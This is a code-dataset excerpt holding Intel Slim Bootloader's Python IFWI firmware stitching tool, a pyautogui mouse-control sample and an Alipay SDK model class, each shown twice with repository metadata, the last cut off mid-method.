print ('Creating %sredundant image ...' % ('non-' if non_redundant else ''))
# Remove all in IBB/OBB
remove_list = [
"IFWI/BIOS/BP0/BPDT/BpdtIbb",
"IFWI/BIOS/BP1/BPDT/BpdtIbb",
"IFWI/BIOS/BP1/SBPDT/BpdtObb"
]
for dir_path in remove_list:
comp = IFWI_PARSER.locate_component (root, dir_path)
if not comp:
continue
for each in comp.child:
if each.name.endswith('.man') or each.name.endswith('.met'):
continue
ret = manipulate_ifwi ('REMOVE', dir_path + '/' + each.name, ifwi_data)
if ret != 0:
raise Exception ('REMOVE failed (error code %d) !' % (ret))
# Copy BP0 BPDT into BP1 BPDT
if not non_redundant:
ret = manipulate_ifwi ('COPY', '', ifwi_data)
if ret != 0:
raise Exception ('COPY failed (error code %d) !' % (ret))
if stitch_dir:
ibb_list = [
('IBBL' , 'IBBL'),
('IBB' , 'IBBM'),
('OBB' , 'OBB'),
('FWUP' , 'FWU'),
('CFGD' , 'CFGDATA'),
('KEYH' , 'KEYHASH'),
('VAR' , 'VAR'),
('MRCD' , 'MRCDATA'),
('PLD' , 'PLD'),
]
obb_list = [
('FB' , 'FB'),
('EPLD' , 'EPLD'),
('UVAR' , 'UVAR'),
('PLD' , 'PLD'),
]
# optional components
opt_list = [
'EPLD', 'UVAR'
]
if redundant_payload:
del obb_list[-1]
else:
del ibb_list[-1]
bp1sbpdt = "IFWI/BIOS/BP1/SBPDT/BpdtObb/"
loop = 1 if non_redundant else 2
for bp in range(loop):
dir = "IFWI/BIOS/BP%d/BPDT/BpdtIbb/" % bp
for comp_name, file_name in ibb_list:
file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name)
ret = manipulate_ifwi ('ADD', dir + comp_name, ifwi_data, file_path)
if ret != 0:
raise Exception ('ADD failed (error code %d) !' % (ret))
for comp_name, file_name in obb_list:
if file_name == '':
file_path = ''
else:
file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name)
if (comp_name in opt_list) and not os.path.exists(file_path):
ret = 0
else:
ret = manipulate_ifwi ('ADD', bp1sbpdt + comp_name, ifwi_data, file_path)
if ret != 0:
raise Exception ('ADD failed (error code %d) !' % (ret))
patch_flash_map (ifwi_data, platform_data)
if bios_out:
print ('Creating BIOS image ...')
bios = IFWI_PARSER.locate_component (root, 'IFWI/BIOS')
fd = open (bios_out, 'wb')
fd.write(ifwi_data[bios.offset:bios.offset+bios.length])
fd.close()
print ('Creating IFWI image ...')
fd = open (ifwi_out, 'wb')
fd.write(ifwi_data)
fd.close()
print ('Done!')
def print_ifwi_layout (ifwi_file):
ifwi_parser = IFWI_PARSER ()
ifwi_bin = bytearray (get_file_data (ifwi_file))
ifwi = ifwi_parser.parse_ifwi_binary (ifwi_bin)
if ifwi:
ifwi_parser.print_tree (ifwi)
else:
print ('Invalid IFWI image')
return 0
if __name__ == '__main__':
hexstr = lambda x: int(x, 16)
ap = argparse.ArgumentParser()
ap.add_argument('-i',
'--input-ifwi-file',
dest='ifwi_in',
type=str,
required=True,
help='specify input template IFWI image file path')
ap.add_argument('-o',
'--output-ifwi-file',
dest='ifwi_out',
type=str,
default='',
help='specify generated output IFWI image file path')
ap.add_argument('-b',
'--output-bios-region',
dest='bios_out',
type=str,
default='',
help='specify generated output BIOS region image file path')
ap.add_argument('-s',
'--sitch-zip-file',
dest='stitch_in',
type=str,
default='',
help='specify input sitching zip package file path')
ap.add_argument('-p',
'--platform-data',
dest='plat_data',
type=hexstr,
default=0xFFFFFFFF,
help='specify a platform specific data (HEX, DWORD) for customization')
ap.add_argument('-n',
'--non-redundant',
dest='non_redundant',
action="store_true",
help='specify if the flash layout will be full redundant or not')
if len(sys.argv) == 1:
print('%s' % extra_usage_txt)
args = ap.parse_args()
if args.ifwi_out == '' and args.stitch_in == '':
print_ifwi_layout (args.ifwi_in)
sys.exit (0)
else:
if args.ifwi_out and args.stitch_in == '':
ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, None)
sys.exit (ret)
# Unpack files from zip
print ("Unpacking sitching ZIP package ...")
output_dir = os.path.dirname(args.ifwi_out)
stitch_dir = os.path.join(output_dir, 'stitch_comp')
if os.path.exists(stitch_dir):
shutil.rmtree(stitch_dir)
zf = zipfile.ZipFile(args.stitch_in, 'r', zipfile.ZIP_DEFLATED)
zf.extractall(stitch_dir)
zf.close()
# Create new IFWI
ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, stitch_dir)
# Remove extracted files
if os.path.exists(stitch_dir):
shutil.rmtree(stitch_dir)
sys.exit (ret)
| 38.896552
| 154
| 0.590772
|
port re
import sys
import struct
import argparse
import zipfile
import shutil
from ctypes import *
from subprocess import check_output
from functools import reduce
sys.dont_write_bytecode = True
sblopen_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../'))
if not os.path.exists (sblopen_dir):
sblopen_dir = os.getenv('SBL_SOURCE', '')
sys.path.append (os.path.join(sblopen_dir, 'BootloaderCorePkg' , 'Tools'))
try:
from IfwiUtility import *
except ImportError:
err_msg = "Cannot find IfwiUtility module!\n"
err_msg += "Please make sure 'SBL_SOURCE' environment variable is set to open source SBL root folder."
raise ImportError(err_msg)
extra_usage_txt = \
"""This script creates a new Apollo Lake Slim Bootloader IFWI image basing
on an existing IFWI base image. Please note, this stitching method will work
only if Boot Guard in the base image is not enabled, and the silicon is not
fused with Boot Guard enabled.
Please follow steps below:
1. Download an existing Apollo Lake UEFI IFWI image associated with the target platform,
such as MinnowBoard 3, LeafHill, etc. The URL is below:
https://firmware.intel.com/projects/minnowboard3
Alternatively, the original IFWI image from the onboard SPI flash can be
read out as the base image too.
2. Build Slim Bootloader source tree and generate a stitching ZIP package.
The generated ZIP package is located at:
$(WORKSPACE)/Outputs/apl/Stitch_Components.zip
3. Stitch to create a new IFWI image.
EX:
python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin -s
Stitch_Components.zip -o SlimBoot.bin
4. Optionally, to view the flash layout for an given IFWI image,
specify '-i' option only.
EX:
python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin
"""
FILE_ALIGN = 0x1000
class IFWI_MANIPULATE:
def add_component (self, root, path, before = '$', file_path = ''):
nodes = path.split('/')
parent_path = '/'.join(nodes[:-1])
dir_comp = IFWI_PARSER.locate_component (root, parent_path)
if not dir_comp:
print ('Cannot find DIR %s !' % '/'.join(nodes[:-1]))
return -1
if dir_comp.type != COMPONENT.COMP_TYPE['PART']:
print ('Can only add FILE type !')
return -2
index = None
if before == '$':
index = len(dir_comp.child)
elif before == '^':
index = 0
else:
for idx, file in enumerate(dir_comp.child):
if before == file.name:
index = idx
if index is None:
print ('Cannot find FILE %s !' % before)
return -3
else:
length = os.path.getsize(file_path) if file_path else 0x1000
comp = COMPONENT (nodes[-1], COMPONENT.COMP_TYPE['FILE'], 0, length)
comp.set_data (file_path)
dir_comp.add_child (comp, index)
return 0
def remove_component (self, root, path):
nodes = path.split('/')
parent_path = '/'.join(nodes[:-1])
dir_comp = IFWI_PARSER.locate_component (root, parent_path)
if not dir_comp:
print ('Cannot find DIR %s !' % '/'.join(nodes[:-1]))
return -1
if dir_comp.type != COMPONENT.COMP_TYPE['PART']:
print ('Can only replace FILE type !')
return -2
index = None
for idx, file in enumerate(dir_comp.child):
if file.name == nodes[-1]:
index = idx
break
if index is None:
print ('Cannot find FILE %s !' % path)
return -3
else:
del dir_comp.child[index]
return 0
def replace_component (self, root, path, file_path):
comp = IFWI_PARSER.locate_component (root, path)
if not comp:
print ('Cannot find FILE %s !' % path)
return -1
if comp.type != COMPONENT.COMP_TYPE['FILE']:
print ('Can only replace FILE type !' % path)
return -2
comp.length = os.path.getsize(file_path) if file_path else 0x1000
if file_path:
comp.set_data (file_path)
return 0
def copy_component (self, root, path, ifwi_data):
print ("COPY BP0 BPDT to BP1 BPDT ...")
bp1 = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1')
bp0bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP0/BPDT')
bp1bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/BPDT')
bp1sbpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/SBPDT')
bp0bpdt_data = bytearray(ifwi_data[bp0bpdt.offset :bp0bpdt.offset + bp0bpdt.length])
bp1sbpdt_data = bytearray(ifwi_data[bp1sbpdt.offset:bp1sbpdt.offset + bp1sbpdt.length])
bp1sbpdt_offset = bp1bpdt.offset + bp0bpdt.length
ifwi_data[bp1bpdt.offset:bp1sbpdt_offset] = bp0bpdt_data
bp1sbpdt_end_offset = bp1sbpdt_offset + bp1sbpdt.length
ifwi_data[bp1sbpdt_offset:bp1sbpdt_end_offset] = bp1sbpdt_data
padding = bp1.offset + bp1.length - bp1sbpdt_end_offset
if padding < 0:
print ('Insufficiant space in BP1 partition !')
return -1
ifwi_data[bp1sbpdt_end_offset:bp1sbpdt_end_offset + padding] = b'\xff' * padding
offset = bp1bpdt.offset
bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset)
offset += sizeof(BPDT_HEADER)
for idx in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset)
if "BpdtSbpdt" == str(bpdt_entry.type):
bpdt_entry.sub_part_size = bp1sbpdt.length
offset += sizeof(BPDT_ENTRY)
offset = bp1sbpdt_offset
bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset)
offset += sizeof(BPDT_HEADER)
for idx in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset)
bpdt_entry.sub_part_offset += (bp0bpdt.length - bp1bpdt.length)
offset += sizeof(BPDT_ENTRY)
print ("Done!")
return 0
def create_dir_data (self, dir, ifwi_data):
support_list = ["BpdtIbb", "BpdtObb"]
if dir.name not in support_list:
raise Exception ('Only %s are supported !' % ' '.join(support_list))
adjust = True
offset = len(dir.child) * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer(ifwi_data, dir.offset)
dir_data = bytearray(sub_dir_hdr) + b'\xff' * (offset - sizeof(SUBPART_DIR_HEADER))
for idx, comp in enumerate(dir.child):
delta = 0
parts = os.path.splitext(comp.name)
if len(parts) > 1 and parts[1] in ['.man', '.met']:
align = 1
elif comp.name in ['IPAD', 'OPAD']:
align = 0x40
else:
align = FILE_ALIGN
delta = dir.offset & (FILE_ALIGN - 1)
next_offset = ((offset + delta + align - 1) & ~(align - 1))
count = next_offset - offset
if adjust:
adjust = False
count -= delta
dir_data.extend(b'\xff' * count)
comp_data = comp.get_data()
if comp_data:
dir_data.extend(comp_data)
else:
dir_data.extend(ifwi_data[comp.offset : comp.offset + comp.length])
sub_dir = SUBPART_DIR_ENTRY()
sub_dir.entry_name = comp.name.encode()
sub_dir.entry_offset = next_offset - delta
sub_dir.entry_size = comp.length
sub_dir.reserved1 = 0
sub_dir.reserved2 = 0
entry_offset = idx * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
dir_data[entry_offset:entry_offset+sizeof(SUBPART_DIR_ENTRY)] = bytearray(sub_dir)
next_offset += comp.length
offset = next_offset
align = FILE_ALIGN
next_offset = ((offset + align - 1) & ~(align - 1))
dir_data.extend(b'\xff' * (next_offset - offset))
sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer_copy(dir_data)
sub_dir_hdr.num_of_entries = len(dir.child)
sub_dir_hdr.checksum = 0
dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr)
length = sub_dir_hdr.num_of_entries * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
sum_buf = (c_uint8 * length).from_buffer_copy(dir_data)
sub_dir_hdr.checksum = (~sum(sum_buf) + 1) & 0xFF
dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr)
remaining = (dir.offset + len(dir_data)) & (FILE_ALIGN - 1)
if remaining:
dir_data.extend(b'\xff' * (FILE_ALIGN - remaining))
return dir_data
def refresh_ifwi_for_dir (self, dir, ifwi_data):
dir_data = self.create_dir_data (dir, ifwi_data)
length = len (dir_data)
adjust_length = length - dir.length
if (dir.offset + length) & (FILE_ALIGN - 1):
print ('DIR total size needs to be 4KB aligned !')
org_bpdt_offset = dir.parent.parent.child[0].offset
org_sbpdt_offset = dir.parent.parent.child[1].offset
old_dir = dir
while dir.type != COMPONENT.COMP_TYPE['BP']:
for each in dir.parent.child:
if each.offset > dir.offset:
each.offset += adjust_length
dir.length += adjust_length
dir = dir.parent
dir = old_dir
parent = dir.parent
bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, parent.offset)
base = parent.offset + sizeof(BPDT_HEADER)
found = False
for idx in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base + idx * sizeof(BPDT_ENTRY))
comps = [x for x in parent.child if x.name == str(bpdt_entry.type)]
if len(comps) == 0:
continue
if len(comps) > 1:
raise Exception ('Found duplicated DIR %s !', bpdt_entry.type)
bpdt_entry.sub_part_offset = comps[0].offset - parent.parent.offset
if dir.name == str(bpdt_entry.type):
bpdt_entry.sub_part_size = length
found = True
if not found:
raise Exception ('Could not find DIR %s !', dir.name)
bp_comp = parent.parent
if parent.name == 'BPDT':
bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_sbpdt_offset)
bpdt_hdr.xor_sum = 0
base_offset = org_sbpdt_offset + sizeof(BPDT_HEADER)
for idx in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY))
bpdt_entry.sub_part_offset += adjust_length
if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length:
raise Exception ('Insufficiant space in layout !')
else:
bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_bpdt_offset)
bpdt_hdr.xor_sum = 0
base_offset = org_bpdt_offset + sizeof(BPDT_HEADER)
for idx in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY))
if str(bpdt_entry.type) == "BpdtSbpdt":
bpdt_entry.sub_part_size += adjust_length
if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length:
raise Exception ('Insufficiant space in layout !')
if adjust_length > 0:
ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \
ifwi_data[old_dir.offset + old_dir.length - adjust_length : bp_comp.offset + bp_comp.length - adjust_length] + \
ifwi_data[bp_comp.offset + bp_comp.length:]
else:
adjust_length = -adjust_length
ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \
ifwi_data[old_dir.offset + old_dir.length + adjust_length: bp_comp.offset + bp_comp.length] + \
b'\xff' * adjust_length + ifwi_data[bp_comp.offset + bp_comp.length:]
return 0
def manipulate_ifwi (action, path, ifwi_data, file_name = '', before = '$'):
print ('%s %s ...' % (action, path))
root = IFWI_PARSER.parse_ifwi_binary (ifwi_data)
ifwi_op = IFWI_MANIPULATE()
if action == "REMOVE":
ret = ifwi_op.remove_component (root, path)
elif action == "ADD":
ret = ifwi_op.add_component (root, path, before, file_name)
elif action == "REPLACE":
ret = ifwi_op.replace_component (root, path, file_name)
elif action == "COPY":
ret = ifwi_op.copy_component (root, 'IFWI/BIOS/BP0/BPDT', ifwi_data)
else:
ret = -100
if ret == 0 and path:
dir_path = '/'.join(path.split('/')[:-1])
dir = IFWI_PARSER.locate_component (root, dir_path)
ifwi_op.refresh_ifwi_for_dir (dir, ifwi_data)
print ('done!')
return ret
def patch_flash_map (image_data, platform_data = 0xffffffff):
comp_bpdt_dict = {
b'RSVD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/RSVD",
b'IAS1' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/FB",
b'EPLD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/EPLD",
b'UVAR' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/UVAR",
b'PYLD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/PLD",
b'VARS' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/VAR",
b'MRCD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/MRCD",
b'CNFG' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/CFGD",
b'KEYH' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/KEYH",
b'FWUP' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/FWUP",
b'SG02' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/OBB",
b'SG1B' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBB",
b'SG1A' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBBL",
b'_BPM' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/BPM.met",
}
print ("Patching Slim Bootloader Flash Map table ...")
output_image_data = image_data
ifwi = IFWI_PARSER.parse_ifwi_binary (output_image_data)
if not ifwi:
return -1
pld = IFWI_PARSER.locate_component (ifwi, comp_bpdt_dict[b'PYLD'])
if not pld:
comp_bpdt_dict[b'PYLD'] = "IFWI/BIOS/BP1/SBPDT/BpdtObb/PLD"
bp0 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP0')
bp1 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP1')
if not bp0 or not bp1:
return -2
for part in range(2):
path = comp_bpdt_dict[b'SG1A'].replace("BP0", "BP%d" % part)
comp = IFWI_PARSER.locate_component (ifwi, path)
if not comp:
if part == 0:
raise Exception("Cannot locate %s !" % path)
else:
continue
stage1AOffset = comp.offset
stage1ALength = comp.length
temp = stage1AOffset + stage1ALength - 8
c_uint32.from_buffer (output_image_data, temp - 4).value = platform_data
fla_map_off = (bytes_to_value(output_image_data[temp:temp+4]) + stage1ALength) & 0xFFFFFFFF
fla_map_str = FLASH_MAP.from_buffer (output_image_data, stage1AOffset + fla_map_off)
entry_num = (fla_map_str.length - sizeof(FLASH_MAP)) // sizeof(FLASH_MAP_DESC)
fla_map_str.romsize = bp0.length + bp1.length
if part == 1:
fla_map_str.attributes |= FLASH_MAP.FLASH_MAP_ATTRIBUTES['BACKUP_REGION']
for idx in range (entry_num):
desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC))
path = comp_bpdt_dict[desc.sig]
if part == 1 or (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']):
path = path.replace("BP0", "BP1")
if part == 1 and (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']):
desc.flags |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['BACKUP']
if desc.sig == b'RSVD':
desc.offset = bp1.offset + bp1.length - desc.size - bp0.offset
continue
comp = IFWI_PARSER.locate_component (ifwi, path)
if not comp:
if desc.sig == b'KEYH':
continue
raise Exception("Cannot locate component '%s' in BPDT !" % path)
if (desc.size == 0) and (desc.offset == 0):
desc.size = comp.length
desc.offset = comp.offset - bp0.offset
continue
if desc.size != comp.length and comp.name != 'FB':
raise Exception("Mismatch component '%s' length in FlashMap and BPDT !" % comp_bpdt_dict[desc.sig])
if desc.sig not in [b'_BPM'] and (comp.offset & 0xFFF > 0):
raise Exception("Component '%s' %x is not aligned at 4KB boundary, " \
"please adjust padding size for IPAD/OPAD in BoardConfig.py and rebuild !" % (comp_bpdt_dict[desc.sig], comp.offset))
desc.offset = comp.offset - bp0.offset
if (bp1.offset + bp1.length - 0x1000) <= (desc.offset + desc.size) <= (bp1.offset + bp1.length):
raise Exception("Component '%s' offset is in bootloader reserved region, please try to reduce compoent size !" % comp_bpdt_dict[desc.sig])
limit = bp1.offset + bp1.length - bp0.offset - 0x40000
for idx in range (entry_num):
desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC))
if desc.sig == b'RSVD':
continue
if desc.offset >= limit or desc.offset + desc.size > limit:
print("WARNING: Component '%s' in BP%d is located inside CSME memory mapped region, direct access might fail." % (desc.sig, part))
print ("Flash map was patched successfully!")
return 0
def create_ifwi_image (ifwi_in, ifwi_out, bios_out, platform_data, non_redundant, stitch_dir):
redundant_payload = True
ifwi_data = bytearray (get_file_data (ifwi_in))
root = IFWI_PARSER.parse_ifwi_binary (ifwi_data)
if not root:
raise Exception ('Invalid IFWI input image format !')
comp = IFWI_PARSER.locate_component (root, "IFWI/BIOS/BP0/BPDT/BpdtUepType")
if not comp:
raise Exception ('Unsupported base image format !')
data = ifwi_data[comp.offset + 0x30:comp.offset + 0x32]
if (data[0] & 0x0F) != 0x00:
raise Exception ('Unsupported base image type. boot guard might have been enabled in this image !')
print ('Creating %sredundant image ...' % ('non-' if non_redundant else ''))
remove_list = [
"IFWI/BIOS/BP0/BPDT/BpdtIbb",
"IFWI/BIOS/BP1/BPDT/BpdtIbb",
"IFWI/BIOS/BP1/SBPDT/BpdtObb"
]
for dir_path in remove_list:
comp = IFWI_PARSER.locate_component (root, dir_path)
if not comp:
continue
for each in comp.child:
if each.name.endswith('.man') or each.name.endswith('.met'):
continue
ret = manipulate_ifwi ('REMOVE', dir_path + '/' + each.name, ifwi_data)
if ret != 0:
raise Exception ('REMOVE failed (error code %d) !' % (ret))
if not non_redundant:
ret = manipulate_ifwi ('COPY', '', ifwi_data)
if ret != 0:
raise Exception ('COPY failed (error code %d) !' % (ret))
if stitch_dir:
ibb_list = [
('IBBL' , 'IBBL'),
('IBB' , 'IBBM'),
('OBB' , 'OBB'),
('FWUP' , 'FWU'),
('CFGD' , 'CFGDATA'),
('KEYH' , 'KEYHASH'),
('VAR' , 'VAR'),
('MRCD' , 'MRCDATA'),
('PLD' , 'PLD'),
]
obb_list = [
('FB' , 'FB'),
('EPLD' , 'EPLD'),
('UVAR' , 'UVAR'),
('PLD' , 'PLD'),
]
opt_list = [
'EPLD', 'UVAR'
]
if redundant_payload:
del obb_list[-1]
else:
del ibb_list[-1]
bp1sbpdt = "IFWI/BIOS/BP1/SBPDT/BpdtObb/"
loop = 1 if non_redundant else 2
for bp in range(loop):
dir = "IFWI/BIOS/BP%d/BPDT/BpdtIbb/" % bp
for comp_name, file_name in ibb_list:
file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name)
ret = manipulate_ifwi ('ADD', dir + comp_name, ifwi_data, file_path)
if ret != 0:
raise Exception ('ADD failed (error code %d) !' % (ret))
for comp_name, file_name in obb_list:
if file_name == '':
file_path = ''
else:
file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name)
if (comp_name in opt_list) and not os.path.exists(file_path):
ret = 0
else:
ret = manipulate_ifwi ('ADD', bp1sbpdt + comp_name, ifwi_data, file_path)
if ret != 0:
raise Exception ('ADD failed (error code %d) !' % (ret))
patch_flash_map (ifwi_data, platform_data)
if bios_out:
print ('Creating BIOS image ...')
bios = IFWI_PARSER.locate_component (root, 'IFWI/BIOS')
fd = open (bios_out, 'wb')
fd.write(ifwi_data[bios.offset:bios.offset+bios.length])
fd.close()
print ('Creating IFWI image ...')
fd = open (ifwi_out, 'wb')
fd.write(ifwi_data)
fd.close()
print ('Done!')
def print_ifwi_layout (ifwi_file):
ifwi_parser = IFWI_PARSER ()
ifwi_bin = bytearray (get_file_data (ifwi_file))
ifwi = ifwi_parser.parse_ifwi_binary (ifwi_bin)
if ifwi:
ifwi_parser.print_tree (ifwi)
else:
print ('Invalid IFWI image')
return 0
if __name__ == '__main__':
hexstr = lambda x: int(x, 16)
ap = argparse.ArgumentParser()
ap.add_argument('-i',
'--input-ifwi-file',
dest='ifwi_in',
type=str,
required=True,
help='specify input template IFWI image file path')
ap.add_argument('-o',
'--output-ifwi-file',
dest='ifwi_out',
type=str,
default='',
help='specify generated output IFWI image file path')
ap.add_argument('-b',
'--output-bios-region',
dest='bios_out',
type=str,
default='',
help='specify generated output BIOS region image file path')
ap.add_argument('-s',
'--sitch-zip-file',
dest='stitch_in',
type=str,
default='',
help='specify input sitching zip package file path')
ap.add_argument('-p',
'--platform-data',
dest='plat_data',
type=hexstr,
default=0xFFFFFFFF,
help='specify a platform specific data (HEX, DWORD) for customization')
ap.add_argument('-n',
'--non-redundant',
dest='non_redundant',
action="store_true",
help='specify if the flash layout will be full redundant or not')
if len(sys.argv) == 1:
print('%s' % extra_usage_txt)
args = ap.parse_args()
if args.ifwi_out == '' and args.stitch_in == '':
print_ifwi_layout (args.ifwi_in)
sys.exit (0)
else:
if args.ifwi_out and args.stitch_in == '':
ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, None)
sys.exit (ret)
print ("Unpacking sitching ZIP package ...")
output_dir = os.path.dirname(args.ifwi_out)
stitch_dir = os.path.join(output_dir, 'stitch_comp')
if os.path.exists(stitch_dir):
shutil.rmtree(stitch_dir)
zf = zipfile.ZipFile(args.stitch_in, 'r', zipfile.ZIP_DEFLATED)
zf.extractall(stitch_dir)
zf.close()
ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, stitch_dir)
if os.path.exists(stitch_dir):
shutil.rmtree(stitch_dir)
sys.exit (ret)
| true
| true
|
f705c96c12e4e0c7f7af29723e12d8fbcdab4c40
| 907
|
py
|
Python
|
src/mouse_controller.py
|
NAITTOU/computer_pointer_controller
|
b36ce51e7638543b54da1abe56f7ae54eb21918f
|
[
"MIT"
] | 1
|
2020-09-04T06:28:43.000Z
|
2020-09-04T06:28:43.000Z
|
src/mouse_controller.py
|
NAITTOU/computer_pointer_controller
|
b36ce51e7638543b54da1abe56f7ae54eb21918f
|
[
"MIT"
] | 1
|
2022-01-13T02:59:41.000Z
|
2022-01-13T02:59:41.000Z
|
src/mouse_controller.py
|
NAITTOU/computer_pointer_controller
|
b36ce51e7638543b54da1abe56f7ae54eb21918f
|
[
"MIT"
] | null | null | null |
'''
This is a sample class that you can use to control the mouse pointer.
It uses the pyautogui library. You can set the precision for mouse movement
(how much the mouse moves) and the speed (how fast it moves) by changing
precision_dict and speed_dict.
Calling the move function with the x and y output of the gaze estimation model
will move the pointer.
This class is provided to help get you started; you can choose whether you want to use it or create your own from scratch.
'''
import pyautogui
pyautogui.FAILSAFE = False
class MouseController:
def __init__(self, precision, speed):
precision_dict={'high':100, 'low':1000, 'medium':500}
speed_dict={'fast':1, 'slow':10, 'medium':5}
self.precision=precision_dict[precision]
self.speed=speed_dict[speed]
def move(self, x, y):
pyautogui.moveRel(x*self.precision, -1*y*self.precision, duration=self.speed)
| 43.190476
| 122
| 0.732084
|
import pyautogui
pyautogui.FAILSAFE = False
class MouseController:
def __init__(self, precision, speed):
precision_dict={'high':100, 'low':1000, 'medium':500}
speed_dict={'fast':1, 'slow':10, 'medium':5}
self.precision=precision_dict[precision]
self.speed=speed_dict[speed]
def move(self, x, y):
pyautogui.moveRel(x*self.precision, -1*y*self.precision, duration=self.speed)
| true
| true
|
f705c9972c508fc15446070fc555ad919151b644
| 1,253
|
py
|
Python
|
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
|
alipay/alipay-sdk-python-all
|
1b63620431d982d30d39ee0adc4b92463cbcee3c
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
|
alipay/alipay-sdk-python-all
|
1b63620431d982d30d39ee0adc4b92463cbcee3c
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
|
alipay/alipay-sdk-python-all
|
1b63620431d982d30d39ee0adc4b92463cbcee3c
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AntOcrVehicleplateIdentifyModel(object):
def __init__(self):
self._image = None
self._type = None
@property
def image(self):
return self._image
@image.setter
def image(self, value):
self._image = value
@property
def type(self):
return self._type
@type.setter
def type(self, value):
self._type = value
def to_alipay_dict(self):
params = dict()
if self.image:
if hasattr(self.image, 'to_alipay_dict'):
params['image'] = self.image.to_alipay_dict()
else:
params['image'] = self.image
if self.type:
if hasattr(self.type, 'to_alipay_dict'):
params['type'] = self.type.to_alipay_dict()
else:
params['type'] = self.type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AntOcrVehicleplateIdentifyModel()
if 'image' in d:
o.image = d['image']
if 'type' in d:
o.type = d['type']
return o
| 22.375
| 61
| 0.545092
|
import json
from alipay.aop.api.constant.ParamConstants import *
class AntOcrVehicleplateIdentifyModel(object):
def __init__(self):
self._image = None
self._type = None
@property
def image(self):
return self._image
@image.setter
def image(self, value):
self._image = value
@property
def type(self):
return self._type
@type.setter
def type(self, value):
self._type = value
def to_alipay_dict(self):
params = dict()
if self.image:
if hasattr(self.image, 'to_alipay_dict'):
params['image'] = self.image.to_alipay_dict()
else:
params['image'] = self.image
if self.type:
if hasattr(self.type, 'to_alipay_dict'):
params['type'] = self.type.to_alipay_dict()
else:
params['type'] = self.type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AntOcrVehicleplateIdentifyModel()
if 'image' in d:
o.image = d['image']
if 'type' in d:
